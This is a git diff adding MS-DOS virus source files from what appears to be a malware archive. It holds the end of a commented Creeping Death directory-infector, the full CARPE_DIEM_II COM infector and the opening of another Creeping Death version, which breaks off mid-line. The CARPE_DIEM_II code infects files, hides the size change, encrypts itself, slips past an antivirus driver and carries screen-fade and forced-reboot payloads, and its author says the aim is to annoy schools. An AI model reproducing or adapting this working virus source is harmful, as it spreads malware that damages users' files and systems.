hasn't been accesed yet. ; +; ; +;*****************************************************************************; + + cld ; clear direction flag + lds bx,es:[bx] ; get pointer to first drive + ; paramenter block + +Search: cmp bx,-1 ; last block ? + je Last + mov ax,ds:[bx+di+15h] ; get segment of device header + cmp ax,70h ; dos device header ?? + jne Next ; no, go to next device + xchg ax,cx + mov byte ptr ds:[bx+di+18h],-1 ; set access flag to "drive + ; has not been accessed" + mov si,offset Header-4 ; set address of new device + xchg si,ds:[bx+di+13h] ; and save old address + mov ds:[bx+di+15h],cs +Next: lds bx,ds:[bx+di+19h] ; next drive parameter block + jmp Search + +;*****************************************************************************; +; ; +; If the virus has failed in starting the orginal exe-file it will jump here. ; +; ; +;*****************************************************************************; + +Boot: mov ds,ds:[16h] ; es = parent PSP + mov bx,ds:[16h] ; bx = parent PSP of Parent PSP + xor si,si + sub bx,1 + jnb Exec + mov ax,cs + dec ax + mov ds,ax + mov cx,8 + mov si,8 + mov di,0ffh +Count: lodsb + or al,al + loopne Count + not cx + and cx,7 +NextByte: mov si,8 + inc di + push di + push cx + rep cmpsb + pop cx + pop di + jne NextByte +BeginName: dec di + cmp byte ptr es:[di-1],0 + jne BeginName + mov si,di + mov bx,es + jmp short Exec + +;*****************************************************************************; +; ; +; If none of these devices is found it means the virus is already resident ; +; and the virus wasn't able to start the orginal exe-file (the file is ; +; corrupted by copying it without the virus memory resident). If the device ; +; is found the information in the header is copied. ; +; ; +;*****************************************************************************; + +Last: jcxz Exit + +;*****************************************************************************; +; ; +; The information about the dos device driver is copyed to the virus code ; +; segment ; +; ; +;*****************************************************************************; + + mov ds,cx ; ds = segment of Device Driver + add si,4 + push cs + pop es + mov di,offset Header + movsw + lodsw + mov es:StrBlock,ax + mov ax,offset Strategy + stosw + lodsw + mov es:IntBlock,ax + mov ax,offset Interrupt + stosw + movsb + +;*****************************************************************************; +; ; +; Deallocate the environment memory block and start the this file again, but ; +; if the virus succeeds it will start the orginal exe-file. ; +; ; +;*****************************************************************************; + + push cs + pop ds + mov bx,ds:[2ch] ; environment segment + or bx,bx ; =0 ? + jz Boot + mov es,bx + mov ah,49h ; deallocate memory + int 21h + xor ax,ax + mov di,1 +Seek: dec di ; scan for end of environment + scasw + jne Seek + lea si,ds:[di+2] ; es:si = start of filename +Exec: push bx + push cs + pop ds + mov bx,offset Param + mov ds:[bx+4],cs ; set segments in EPB + mov ds:[bx+8],cs + mov ds:[bx+12],cs + pop ds + push cs + pop es + + mov di,offset f_name ; copy name of this file + push di + mov cx,40 + rep movsw + push cs + pop ds + + mov ah,3dh ; open file, this file will + mov dx,offset File ; not be found but the entire + int 21h ; directory is searched and + pop dx ; infected + + mov ax,4b00h ; execute file + int 21h +Exit: mov ah,4dh ; get exit-code + int 21h + mov ah,4ch ; terminate (al = exit code) + int 21h + +;*****************************************************************************; +; ; +; Installation complete ; +; ; +;*****************************************************************************; +; ; +; The next part contains the device driver used by creeping death to infect ; +; directory's ; +; ; +; The device driver uses only the strategy routine to handle the requests. ; +; I don't know if this is because the virus will work better or the writer ; +; of this virus didn't know how to do it right. ; +; ; +;*****************************************************************************; + + +Strategy: mov cs:RequestOffset,bx + mov cs:RequestSegment,es + retf + +Interrupt: push ax ; driver strategy block + push bx + push cx ; save registers + push dx + push si + push di + push ds + push es + + les bx,cs:Request + push es + pop ds + mov al,ds:[bx+2] ; Command Code + + cmp al,4 ; Input + je Input + cmp al,8 ; Output + je Output + cmp al,9 + je Output + + call DoRequest + + cmp al,2 ; Build BPB + jne Return + lds si,ds:[bx+12h] ; copy the BPB and change it + mov di,offset bpb_buf ; into one that hides the virus + mov es:[bx+12h],di + mov es:[bx+14h],cs + push es ; copy + push cs + pop es + mov cx,16 + rep movsw + pop es + push cs + pop ds + mov al,ds:[di+2-32] ; change + cmp al,2 + adc al,0 + cbw + cmp word ptr ds:[di+8-32],0 ; >32mb partition ? + je m32 ; yes, jump to m32 + sub ds:[di+8-32],ax ; <32mb partition + jmp short Return +m32: sub ds:[di+15h-32],ax ; >32mb partition + sbb word ptr ds:[di+17h-32],0 +Return: pop es ; return to caller + pop ds + pop di + pop si + pop dx + pop cx + pop bx + pop ax + retf + +Output: mov cx,0ff09h ; check if disk changed + call check + jz InfectSector ; no, just infect sector + call DoRequest ; yes, write virus to disk + jmp short inf_dsk + +InfectSector: jmp _InfectSector ; infect sector +Read: jmp _Read ; read sector +ReadError: add sp,16 ; error during request + jmp short Return + +Input: call check ; check if disk changed + jz Read ; no, read sector +inf_dsk: mov byte ptr ds:[bx+2],4 ; yes, write virus to disk + cld ; save last part of request + lea si,ds:[bx+0eh] + mov cx,8 +save: lodsw + push ax + loop save + mov word ptr ds:[bx+14h],1 ; read 1st sector on disk + call ReadSector + jnz ReadError + mov byte ptr ds:[bx+2],2 ; build BPB + call DoRequest + lds si,ds:[bx+12h] ; ds:si = BPB + mov di,ds:[si+6] ; size of root directory + add di,15 ; in sectors + mov cl,4 + shr di,cl + mov al,ds:[si+5] + cbw + mov dx,ds:[si+0bh] + mul dx ; ax=fat sectors, dx=0 + add ax,ds:[si+3] + add di,ax + push di ; save it on stack + mov ax,ds:[si+8] ; total number of sectors + cmp ax,dx ; >32mb + jnz more ; no, skip next 2 instructions + mov ax,ds:[si+15h] ; get number of sectors + mov dx,ds:[si+17h] +more: xor cx,cx ; cx=0 + sub ax,di ; dx:ax=number is data sectors + sbb dx,cx + mov cl,ds:[si+2] ; cx=sectors / cluster + div cx ; number of clusters on disk + cmp cl,2 ; 1 sector/cluster ? + sbb ax,-1 ; number of clusters (+1 or +2) + push ax ; save it on stack + call Convert ; get fat sector and offset in + mov byte ptr es:[bx+2],4 ; sector + mov es:[bx+14h],ax + call ReadSector ; read fat sector +again: lds si,es:[bx+0eh] + add si,dx + sub dh,cl ; has something to do with the + adc dx,ax ; encryption of the pointers + mov word ptr cs:[gad+1],dx + cmp cl,1 ; 1 sector / cluster + jne Ok +SmallModel: not di ; this is used when the + and ds:[si],di ; clusters are 1 sector long + pop ax + push ax + inc ax + push ax + mov dx,0fh + test di,dx + jz here + inc dx + mul dx +here: or ds:[si],ax + pop ax + call Convert + mov si,es:[bx+0eh] + add si,dx +Ok: mov ax,ds:[si] + and ax,di + mov dx,di ; allocate cluster + dec dx + and dx,di + not di + and ds:[si],di + or ds:[si],dx + cmp ax,dx ; cluster already allocated by + pop ax ; the virus ? + pop di + mov word ptr cs:[pointer+1],ax + je _Read_ ; yes, don't write it and go on + mov dx,ds:[si] + push ds + push si + mov byte ptr es:[bx+2],8 ; write + call DoRequest ; write the adjusted sector to + pop si ; disk + pop ds + jnz _Read_ + call ReadSector ; read it again + cmp ds:[si],dx ; is it written correctly ? + jne _Read_ ; no, can't infect disk + dec ax + dec ax ; calculate the sector number + mul cx ; to write the virus to + add ax,di + adc dx,0 + push es + pop ds + mov word ptr ds:[bx+12h],2 + mov ds:[bx+14h],ax ; store it in the request hdr + test dx,dx + jz less + mov word ptr ds:[bx+14h],-1 + mov ds:[bx+1ah],ax + mov ds:[bx+1ch],dx +less: mov ds:[bx+10h],cs + mov ds:[bx+0eh],100h + mov byte ptr es:[bx+2],8 ; write it + call EncryptWrite1 + +_Read_: mov byte ptr ds:[bx+2],4 ; restore this byte + std ; restore other part of the + lea di,ds:[bx+1ch] ; request + mov cx,8 +load: pop ax + stosw + loop load +_Read: call DoRequest ; do request + + mov cx,9 +_InfectSector: mov di,es:[bx+12h] ; get number of sectors read + lds si,es:[bx+0eh] ; get address of data + sal di,cl ; calculate end of buffer + xor cl,cl + add di,si + xor dl,dl + push ds ; infect the sector + push si + call find + jcxz no_inf ; write sector ? + mov al,8 + xchg al,es:[bx+2] ; save command byte + call DoRequest ; write sector + mov es:[bx+2],al ; restore command byte + and byte ptr es:[bx+4],07fh +no_inf: pop si + pop ds + inc dx ; disinfect sector in memory + call find + jmp Return ; return to caller + +;*****************************************************************************; +; ; +; Subroutines ; +; ; +;*****************************************************************************; + +find: mov ax,ds:[si+8] ; (dis)infect sector in memory + cmp ax,"XE" ; check for .exe + jne com + cmp ds:[si+10],al + je found +com: cmp ax,"OC" ; check for .com + jne go_on + cmp byte ptr ds:[si+10],"M" + jne go_on +found: test word ptr ds:[si+1eh],0ffc0h ; file to big + jnz go_on ; more than 4mb + test word ptr ds:[si+1dh],03ff8h ; file to small + jz go_on ; less than 2048 bytes + test byte ptr ds:[si+0bh],1ch ; directory, system or + jnz go_on ; volume label + test dl,dl ; infect or disinfect ? + jnz rest +pointer: mov ax,1234h ; ax = viral cluster + cmp ax,ds:[si+1ah] ; file already infected ? + je go_on ; yes, go on + xchg ax,ds:[si+1ah] ; exchange pointers +gad: xor ax,1234h ; encryption + mov ds:[si+14h],ax ; store it on another place + loop go_on ; change cx and go on +rest: xor ax,ax ; ax = 0 + xchg ax,ds:[si+14h] ; get pointer + xor ax,word ptr cs:[gad+1] ; Encrypt + mov ds:[si+1ah],ax ; store it on the right place +go_on: rol word ptr cs:[gad+1],1 ; change encryption + add si,32 ; next directory entry + cmp di,si ; end of buffer ? + jne find ; no, do it again + ret ; return + +check: mov ah,ds:[bx+1] ; get number of unit +drive: cmp ah,-1 ; same as last call ? + mov byte ptr cs:[drive+2],ah ; set 2nd parameter + jne changed + push ds:[bx+0eh] ; save word + mov byte ptr ds:[bx+2],1 ; disk changed ? + call DoRequest + cmp byte ptr ds:[bx+0eh],1 ; 1=Yes + pop ds:[bx+0eh] ; restore word + mov ds:[bx+2],al ; restore command +changed: ret ; return + +ReadSector: mov word ptr es:[bx+12h],1 ; read sector from disk + +DoRequest: db 09ah ; call 70:?, orginal strategy +StrBlock dw ?,70h + db 09ah ; call 70:?, orginal interrupt +IntBlock dw ?,70h + test byte ptr es:[bx+4],80h ; error ? yes, zf = 0 + ret ; return + +Convert: cmp ax,0ff0h ; convert cluster number into + jae fat_16 ; an sector number and offset + mov si,3 ; into this sector containing + xor word ptr cs:[si+gad-1],si ; the fat-item of this + mul si ; cluster + shr ax,1 + mov di,0fffh + jnc cont + mov di,0fff0h + jmp short cont +fat_16: mov si,2 + mul si + mov di,0ffffh +cont: mov si,512 + div si + inc ax + ret + +EncryptWrite1: push ds + push cs + pop ds + push es + push cs + pop es + cld + mov cx,12 + mov si,offset Encrypt + mov di,offset EncryptWrite2 + inc byte ptr ds:[si+8] + rep movsb + mov cl,10 + mov si,offset DoRequest + rep movsb + mov cl,12 + mov si,offset Encrypt + rep movsb + mov ax,0c31fh + stosw + pop es + jmp EncryptWrite2 + +;*****************************************************************************; +; ; +; Data ; +; ; +;*****************************************************************************; + +File: db "C:",255,0 ; the virus tries to open this + ; file + +Counter dw 0 ; this will count the number of + ; systems that are infected by + ; this virus + +Param: dw 0,80h,?,5ch,?,6ch,? ; parameters for the + ; exec-function + +Signature db 'CREEPING DEATH 3' ; Signature + +Header db 7 dup(?) ; this is the header for the + ; device driver + +f_name: db ? ; Buffer for the filename used + ; by the exec-function + +;*****************************************************************************; +; ; +; The End ; +; ; +;*****************************************************************************; + +code ends + +end Encrypt diff --git a/MSDOS/Virus.MSDOS.Unknown.cdiem2.asm b/MSDOS/Virus.MSDOS.Unknown.cdiem2.asm new file mode 100644 index 00000000..ec847831 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cdiem2.asm @@ -0,0 +1,847 @@ +; This is some version of CARPE_DIEM_II. + +; First of all - I would like to thank the following people for +; helping me out: + +; Blonde - Without your assistence, this virus would be no +; full stealth virus, hurray for you. +; Conzouler - For general assistence concerning bug-eliminating. +; Stormbringer - For writing code which make sense. +; Priest - For the code-fragments included, hints, ideas, +; and happy comments! + +; Anyhow, you've seen nearly seen this before. But it has (again) +; taken a new shape. + +; I would like to point out that this version is under no circumstances +; destructive. It might bug sometime while spreading in weird invoroments, +; but since I run pure DOS myself - I havn't done a depth in study +; conserning how and when. Deal with it. + +; The name is a bit confusing I think. I.e. I find the quation from +; Horatius (partly) wrong. + +; The greek - swedish - english translation could read something like: + +; "Seize the day and trust as less as possible on the future. . . " + +; ... but since the future isn't tommorow, but now, I find it a +; bit irritating. Ah well. + +; Anyhow - it's an old simply com-infector, and since it infects +; com-files only - it won't spread very far. But since my favorite +; targets are schools and since my mission is to annoy them as +; much as possible (with payloads), I reckon it does its work good +; enough. (Ask Billy The Kid's sysadm! :)). + +; It isn't too visible since it will stealth file-size increases, +; and disinfect files opened. It has though some pretty visible +; payloads (black-to white color-fade all the time the 17.ten and +; it might print and reboot sometimes. . ). + +; It includes encryption, soft-anti-debugging, anti-tb*, otherwise, +; it's pretty much your average virus. + +; Further greetings goes out to all of VLAD and all of #virus :). + +; Sincerly - The Unforgiven, Immortal Riot - National Malware Developemt, 1995. + +.model tiny +.code +org 100h + +vir_size equ end_of_virus-start_of_virus + +start_of_virus: +vstart: + + jmp entry_point + +install: + + mov ah,2ah ;get date + int 21h + cmp dl,17d ;day = 17? + jne get ;naw! + mov cs:[activate_flag],1 ;yeh! + +get: + mov ah,4ah ;Installation check for the runtime + mov bx,0FFFFH ;part. (This is overkill) + mov cx,0bebeh + int 21h + cmp ax,cx ;ax=cx=0bebe? + jne not_res ;no! + jmp already_resident + +not_res: + mov ah,4ah ;Use normal DOS-functions to + sub bx,(vir_size+15)/16+1 ;fix the TSR part. + int 21h ;(c) DA/PS ?? + + mov ah,48h ;allocate enough room for our code + mov bx,(vir_size+15)/16 + int 21h + + dec ax ;ax-1 = MCB for allocated memory + mov es,ax ;es=segment + mov word ptr es:[1],8 ;Mark DOS as owner + + push cs ;cs=ds + pop ds + + cld ;clear direction for string operations + sub ax,0fh ;100h bytes from allocstart + mov es,ax ;es:[100h] = start of allocated memory + mov di,100h + lea si,[bp+offset start_of_virus] + mov cx,(vir_size+1)/2 ;copy entire virus to memory + rep movsw + + push es ;es=ds + pop ds + + mov ax,3521h ;get interrupt vector from es:bx for + int 21h ;int21h + +tb_lup: + cmp word ptr es:[bx],05ebh ;check for short jump + jne no_tbdriver + cmp byte ptr es:[bx+2],0eah ;and for far jump to next int handler + jne no_tbdriver + les bx,es:[bx+3] ;if found TBdriver, get next int + jmp tb_lup ;handler and use that as int 21 adr + +no_tbdriver: + + mov word ptr ds:[Org21ofs],bx ;save segment:offset for int21h + mov word ptr ds:[Org21seg],es ;in a word each + + cmp byte ptr cs:[activate_flag],1 + jne skip_08_get ;not the 17:ten! + + mov al,08h + int 21h + mov word ptr ds:[org08ofs],bx + mov word ptr ds:[org08seg],es + +skip_08_get: + + mov al,09h ;get interrupt vector for int09h + int 21h ;as well as + mov word ptr ds:[org09ofs],bx + mov word ptr ds:[org09seg],es + + mov dx, offset new_int21h ;set new int.vector for 21h to ds:dx + mov ax,2521h + int 21h + + cmp byte ptr cs:[activate_flag],1 ;day = 17? + jne skip_08_set ;no! + + mov dx, offset new_08h + mov al,08h + int 21h + +skip_08_set: + mov dx,offset new_09h ;09 + mov al,09h + int 21h + +already_resident: +tbdriver: + mov di,100h ;transer back control to the infected + push di ;host program. + push cs ;make cs=ds=es + push cs + pop es + pop ds + lea si,[bp+orgjmp] ;move orgjmp of 4 bytes to the + movsw ;correct (100h) memory adress. + movsw +exit: + ret ;and exit! + + +;+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +; This is the new int21h Handler +;+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +new_int21h: + cmp ah,4ah ;ah=4ah? + jne chk_exec ;no! + cmp bx,0ffffh ;bx = -1? + jne no_match ;no! + cmp cx,0bebeh ;cx = 0bebeh? + jne no_match ;no! + mov ax,cx ;=> Installation check, move bebe into ax + iret ;and return (ax=cx=0bebeh) + +chk_exec: + cmp ax,4b00h ;infect on execute + je go_infect + +chk_close: + cmp ah,3eh ;infect on file-closes + je go_close + + cmp ah,3dh ;normal file-open? - Disinfect + je go_disinfect + +chk_dir: + cmp ah,11h ;stealth file size increase on + je go_fcb_stealth ;directory listenings using + cmp ah,12h ;functions 11/12/4e/4fh + je go_fcb_stealth + + cmp ah,4eh + je go_handle_stealth + + cmp ah,4fh + je go_handle_stealth + +no_match: + jmp do_oldint21h ;jmp org vector + +go_infect: + jmp infect + +go_close: + call setcritical + jmp infect_close + +go_disinfect: + call setcritical + jmp open_disinfect + +go_fcb_stealth: + jmp hide_dir + +go_handle_stealth: + jmp hide_dir2 + +dps db "CARPE_DIEM_II - FLOATING THROUGH THE VOID!",7,0 ;CC + +;+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +; This is the new int08h Handler +;+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +new_08h: + push ax ;Toy with the black-ground color!! + push dx + mov dx,03c8h + xor al,al + out dx,al + inc dx + mov al,[cs:bgcol] + out dx,al + out dx,al + out dx,al + inc [cs:bgcol] + pop dx + pop ax + +do_old08h: + db 0eah ;and jump to saved vector for int08h + org08ofs dw ? + org08seg dw ? + + +;+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +; This is the new int09h Handler +;+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +new_09h: + push ax ;preserve register in use + push ds + + xor ax,ax + mov ds,ax ;ds=0 + + in al,60h ;read key + cmp al,53h ;delete? + jnz no_ctrl_alt_del ;no! + + test byte ptr ds:[0417h],0ch ;test for alt-ctrl + je no_ctrl_alt_del ;no. . + + in al,41h ;get random value + test al,11111b ;2^5 = 32 + jne no_ctrl_alt_del ;value doesnt match! + + push cs ;cs=ds + pop ds + + mov ax,3 ;set grafic mode (text) + int 10h + + mov ah,2 ;set cursor pos + xor bh,bh + mov dx,0A14h ;10,20d (middle) + int 10h + + mov ah,1 ;set cursor + mov cx,2020h ;>nul + int 10h + + mov si,offset dps ;point to v_name + +all_chars: + loop all_chars + lodsb ;load string by byte from dps + or al,al ;end of string? (al=0) + je cold_boot ;yes, make a cold boot + + mov ah,0Eh ;display character from string + int 10h + + jmp short all_chars ;put next char to string + +cold_boot: + db 0eah ;jmp far ptr + db 00h, 00h, 0ffh, 0ffh ;coldboot vector + +no_ctrl_alt_del: + pop ds ;restore registers + pop ax + +do_oldint09h: + db 0eah ;and jump to saved vector for int09h + org09ofs dw ? + org09seg dw ? + +;+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +; This will fool directory listenings using FCBs +;+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +hide_dir: ;FCB stealth routine + pushf ;simulate a int call with pushf + push cs ;and cs, ip on the stack + call do_oldint21h + or al,al ;was the dir call successfull?? + jnz skip_dir ;naw! + + push ax + push bx + push es + + mov ah,62h ;get active PSP to es:bx (51h as well) + int 21h + mov es,bx + cmp bx,es:[16h] ;PSP belongs to dos? + jnz bad_psp ;no, we don't want chkdsk fuck-up's! + + mov bx,dx + mov al,[bx] ;al holds current drive - FFh means + push ax ;extended FCB + mov ah,2fh ;get DTA-area + int 21h + pop ax + inc al ;is it an extended FCB + jnz no_ext + add bx,7 ;if so add 7 to skip garbage +no_ext: + mov al,byte ptr es:[bx+17h] ;get seconds field + and al,1fh + xor al,1dh ;is the file infected?? + jnz no_stealth ;if not - don't hide size + + cmp word ptr es:[bx+1dh],vir_size-3 ;if a file with same seconds + jbe no_stealth ;as an infected is smaller - + sub word ptr es:[bx+1dh],vir_size-3 ;don't hide size +no_stealth: +bad_psp: + pop es + pop bx + pop ax +skip_dir: + iret + +;+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +; This will fool directory listenings using File Handles +;+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +hide_dir2: + + pushf + push cs + call do_oldint21h + + jc no_files + + pushf + push ax + push di + push es + push bx + + mov ah,2fh ;Get DTA-area + int 21h + + mov di,bx + add di,1eh + cld + mov cx,9 ;scan for the dot which + mov al,'.' ;extension + repne scasb ; + jne not_inf + + cmp word ptr es:[di],'OC' ;CO? + jne not_inf ;yeh! + + cmp byte ptr es:[di+2],'M' ;COM? + jne not_inf ;yeh! + + mov ax,es:[bx+16h] ;ask file time + and al,1fh + xor al,1dh ;is the file infected?? + jnz not_inf + + cmp word ptr es:[bx+1ah],vir_size ;dont stealth too small + ja hide ;files + + cmp word ptr es:[bx+1ch],0 ;or too damn big files + je not_inf + +hide: + sub es:[bx+1ah],vir_size-3 ;<- no, its not a SUB-routine! :) + +not_inf: + pop bx + pop es + pop di + pop ax + popf + +no_files: + retf 2 ;return and pop 2 of stack + +infect_close: + push es + push bp + push ax + push bx + push cx + push si + push di + push ds + push dx + cmp bx,4 ;don't close null, aux and so + jbe no_close + + call check_name ;es:di points to file name + add di,8 ;es:di points to extension + cmp word ptr es:[di],'OC' + jne no_close + cmp byte ptr es:[di+2],'M' ;if COM infect it! + je close_infection + +no_close: + pop dx ;No comfile! + pop ds + pop di + pop si + pop cx + pop bx + pop ax + pop bp + pop es + + jmp do_oldint21h + +close_infection: + mov byte ptr es:[di-26h],2 ;mark read & write access + mov cs:Closeflag,1 ;raise closeflag for exit procedure + + mov ax,4200h ;rewind file + xor cx,cx + cwd + int 21h + + jmp short infect_on_close ;infect it +check_name: + push bx + mov ax,1220h ;get job file table for handle at es:di + int 2fh + + mov ax,1216h ;get system file table + mov bl,byte ptr es:[di] ;for handle index in bx + int 2fh + pop bx + add di,20h ;es:di+20h points to file name + ret ;return + +infect: + push es + push bp + push ax + push bx + push cx + push si + push di + push ds + push dx + + call setcritical + + mov cs:Closeflag,0 ;make sure closeflag is off + mov ax,4300h ;get attrib + int 21h + push cx ;save attrib onto the stack + mov ax,4301h ;clear attrib + xor cx,cx + int 21h + + mov ax,3d02h ;open file + pushf + push cs + call do_oldint21h + + xchg ax,bx ;bx = file handle + +infect_on_close: ;entry for infection on 3eh + + push cs ;cs=ds + pop ds + + mov ax,5700h ;get time/date + int 21h + push cx ;save time/date onto the stack + push dx + + mov ah,3fh ;read three bytes to orgjmp + mov cx,4 + mov dx,offset ds:orgjmp + int 21h + + cmp word ptr ds:orgjmp,'ZM' ;check if .EXE file + je exe_file + cmp word ptr ds:orgjmp,'MZ' + je exe_file ;if so - don't infect + +; cmp byte ptr ds:orgjmp+1,'m' ;dont infect command.com +; je skip_infect ;beta versions ONLY! + + cmp byte ptr ds:orgjmp+3,'' ;dont reinfect files! + jne lseek_eof + jmp short skip_infect + +exe_file: + mov cs:exeflag,1 ;mark file as EXE-file, and + jmp short skip_infect ;don't set second value for it! + +lseek_eof: + mov ax,4202h ;go end of file, offset in dx:cx + xor cx,cx ;and return file size in dx:ax. + xor dx,dx + int 21h + + cmp ax,(0FFFFH-Vir_size) ;file is too big? + jae skip_infect ;yeh + cmp ax,(vir_size-100h) ;file is too small? + jb skip_infect ;yeh + + add ax,offset entry_point-106h ;calculate entry offset to jmp + mov word ptr ds:newjmp[1],ax ;move it to newjmp + +get_rnd: + mov ah,2ch ;get random number and put enc_val + int 21h + or dl,dl ;dl=0 - get another value! + je get_rnd + mov word ptr ds:enc_val,dx + mov ax,08d00h ;copy entire virus to 8d00h:100h + mov es,ax + mov di,100h + mov si,di + mov cx,(vir_size+1)/2 + rep movsw + push es + pop ds + xor bp,bp ;and encrypt it there + call encrypt + + mov ah,40h ;write virus to file from position + mov cx,end_of_virus-install ;08d00h:100h + mov dx,offset install + int 21h + + push cs ;cs=ds + pop ds + + mov ax,4200h ;go to beginning of file + xor cx,cx + cwd + int 21h + + mov ah,40h ;and write a new-jmp-construct + mov cx,4 ;of 4 bytes (4byte=infection marker) + mov dx,offset newjmp + int 21h + +skip_infect: + mov ax,5701h ;restore + pop dx ;date + pop cx ;time + cmp byte ptr cs:[exeflag],1 ;exe file? + je skip_sec ;if so - keep the sec_value intact + or cl,00011101b ;and give com-files second value + and cl,11111101b ;29 +skip_sec: + int 21h + cmp byte ptr cs:[Closeflag],1 ;check if execute or close infeection, + je dont_close ;if infect on close, dont close file + +close_file: + mov ah,3eh ;close the file which were executed + int 21h + pop cx ;get original file-attribs +dont_close: + pop dx ;ds:dx = filename + pop ds + cmp byte ptr cs:[Closeflag],1 + je exit_close + mov ax,4301h ;set back saved attribute + int 21h + +exit_close: + mov byte ptr cs:closeflag,0 + call resetcritical + pop di + pop si + pop cx + pop bx + pop ax + pop bp + pop es + +do_oldint21h: +O21h: + db 0eah ;jmp far ptr + org21ofs dw ? ;s:o to + org21seg dw ? ;int21h + + ret ;call to DOS. . . return! + +vir db "SVW: The Unforgiven/Immortal Riot",0 +fcl db "Fuck Corporate Life!",0 ;I agree you SB! + +closeflag db 0 ;0 if exec 1 if close +exeflag db 0 +activate_flag db 0 +bgcol db 0 +newjmp db 0e9h,00h,00h,'' ;buffer to calculate a new entry + +;+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +; Cheesy primitive disinfecting-on-the-fly routine +;+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +open_disinfect: ;ds:dx=filename... + push ax + push bx + push cx + push dx + push di + push si + push ds + push es ;save all regs/segs... + + push ds + pop es ;ds=es + + mov cx,64 ;scan for the dot which + mov di,dx ;seperates filename from + mov al,'.' ;extension + cld ;clear direction + repne scasb ; + + cmp word ptr ds:[di],'OC' ;CO? + je smallc ;yeh! + cmp word ptr ds:[di],'oc' ;co? + jne nocom ;naw! + +smallc: + cmp byte ptr ds:[di+2],'M' ;COM? + je open_com ;yeh! + cmp byte ptr ds:[di+2],'m' ;com? + je open_com ;yeh! + +nocom: + jmp no_opendis ;no com-file being opened! + +open_com: + mov ax,3d02h ;open file with r/w access + pushf + push cs + call o21h + + xchg bx,ax ;put filehandle in BX + + push cs ;cs=ds=es + pop ds + push ds + pop es + + mov ax,5700h ;get file info + int 21h + push cx ;save time + push dx ;and date + + and cl,1fh ;see if seconds = 29 + xor cl,1dh + jne close_dis ;is not! + + mov ah,3fh ;read first four bytes + mov cx,4 ;to orgjmp + mov dx,offset ds:orgjmp + int 21h + + cmp byte ptr ds:orgjmp,0e9h ;first byte = jmp? + jne close_dis ;no! + + cmp byte ptr ds:orgjmp+3,'' ;infected? + jne close_dis ;naw! + + mov ax,4202h ;seek end of file + cwd + xor cx,cx + int 21h + + mov dx,ax ;dx=ax=file size + sub ax,(vend-install+3) ;substract orgjmp + + push dx ;save file size on stack + xor ax,ax ;zero AX + + sub dx,(vend-orgjmp) ;seek orgjmp location + xor cx,cx ;in the infected file + mov ah,42h + int 21h + + mov ah,3fh ;read the original jump + mov cx,4 ;to orgjmp in memory + mov dx,offset ds:orgjmp + int 21h + + xor ax,ax ;zero AX + + cwd ;seek beginning of file + xor cx,cx + mov ah,42h + int 21h + + mov ah,40h ;write the original saved jmp + mov dx,offset orgjmp ;to top of file + mov cx,4 + int 21h + + pop dx ;restore infected file size + + sub dx,(vend-install) ;seek file-size - vir_size + xor ax,ax + xor cx,cx + mov ah,42h + int 21h + + mov ah,40h + xor cx,cx ;write clean file + int 21h + +close_dis: + mov ax,5701h ;restore saved + pop dx ;date + pop cx ;and time + int 21h + + mov ah,3eh ;close the file + pushf + push cs + call o21h + +no_opendis: + pop es + pop ds + pop si + pop di + pop dx + pop cx + pop bx + pop ax ;restore all segments/registers + +bail_out: + jmp o21h ;and bail out! + + +; The Set/Restore critical error handler is written by Stormbringer +; of Phalcon/Skism. I borrowed it because I find it excellent +; coded. I call the routines a lot of times, so. . . credits to him. + +SetCritical: + push ax ds + mov ax,9 + mov ds,ax + push word ptr ds:[0] + push word ptr ds:[2] + pop word ptr cs:[OldCritical+2] + pop word ptr cs:[OldCritical] + mov word ptr ds:[0],offset CriticalError + push cs + pop word ptr ds:[02] + pop ds ax + ret + +ResetCritical: + push ax ds + push word ptr cs:[OldCritical] + mov ax,9 + push word ptr cs:[OldCritical+2] + mov ds,ax + pop word ptr ds:[2] + pop word ptr ds:[0] + pop ds ax + ret + +CriticalError: + mov al,0 + iret + +OldCritical dd 0 + +; --------------------------------------------------------- +; All code below this point is unencrypted - only adresses +; caluculated from the base pointer will vary. Instructions +; are the same. +; --------------------------------------------------------- +decrypt: +encrypt: + mov ax,word ptr ds:[bp+enc_val] ;enc value in ax + lea di,[bp+install] ;pointer to encryption start + mov cx,(encrypt-install)/2 ;number of words to be encrypted +xor_loopy: + xor word ptr ds:[di],ax + inc di + inc di + loop xor_loopy + ret +enc_val dw 0 + +entry_point: + mov sp,102h ;Alternative coding + call get_bp ;to get the delta offset + ;Raver(tm) +get_bp: + mov bp,word ptr ds:[100h] + mov sp,0fffeh + sub bp,offset get_bp + + mov si, offset ditch ;This routine will make + add si,bp ;single-stepping programs +; db 0ebh,0 ;stop. + mov byte ptr ds:[si],0c3h + ditch: + mov byte ptr ds:[si],0c6h + + call decrypt ;decrypt virus + jmp install ;jmp to install code + +orgjmp db 0cdh,20h,00,00 ;buffer to save the 4 first bytes in, + ;remains unecrypted due to disinfection. +end_of_virus: +vend: + + end start_of_virus + diff --git a/MSDOS/Virus.MSDOS.Unknown.cdset.asm b/MSDOS/Virus.MSDOS.Unknown.cdset.asm new file mode 100644 index 00000000..7296587a --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cdset.asm @@ -0,0 +1,487 @@ +; Creeping Death V 1.0 +; +; (C) Copyright 1991 by VirusSoft Corp. + +i13org = 5f8h +i21org = 5fch + + org 100h + + mov sp,600h + inc counter + xor cx,cx + mov ds,cx + lds ax,[0c1h] + add ax,21h + push ds + push ax + mov ah,30h + call jump + cmp al,4 + sbb si,si + mov drive+2,byte ptr -1 + mov bx,60h + mov ah,4ah + call jump + + mov ah,52h + call jump + push es:[bx-2] + lds bx,es:[bx] + +search: mov ax,[bx+si+15h] + cmp ax,70h + jne next + xchg ax,cx + mov [bx+si+18h],byte ptr -1 + mov 